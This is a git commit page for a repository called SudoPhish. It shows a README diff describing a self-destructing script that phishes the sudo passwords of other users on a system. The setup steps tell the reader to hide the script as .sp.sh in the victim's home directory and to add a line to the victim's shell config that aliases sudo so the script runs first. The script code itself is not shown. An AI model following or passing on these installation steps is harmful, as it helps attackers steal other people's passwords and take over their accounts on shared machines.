SudoPhish

Unnamed repository; edit this file 'description' to name the repository.
Log | Files | Refs | README | LICENSE

commit 2290f4db2b76123786b6426d6131833be026a722
parent a6c5934c0cf3fa9b70e6e498a25da211830dba58
Author: MichaelDim02 <31562759+MichaelDim02@users.noreply.github.com>
Date:   Thu,  8 Jul 2021 09:32:20 +0000

Update README.md
Diffstat:
MREADME.md | 3+--
1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/README.md b/README.md @@ -8,8 +8,7 @@ A short self-destructive script to phish the passwords of the users on your syst + Self-destructs # How to set up manually -+ Move everything to the home directory of the user if it isn't there already + Make sure you edit the shabang according to the users interactive SH. If they use bash, make sure the script starts with ```#!/bin/bash```, if they use zsh, then make sure it starts with ```#!/bin/zsh``` etc. It does not work with fish. Default is bash. + Set the ```$shellfile``` variable accordingly (line 21). Default is ```".bashrc"``` + Put the following line at the END of the Shell config file: ``` alias sudo=".sp.sh; sudo" ``` -+ Rename the file to ```.sp.sh``` and give it executable permission with ```chmod +x .sp.sh``` ++ Move the file to the victims home directory, rename it to ```.sp.sh``` and give it executable permission with ```chmod +x .sp.sh```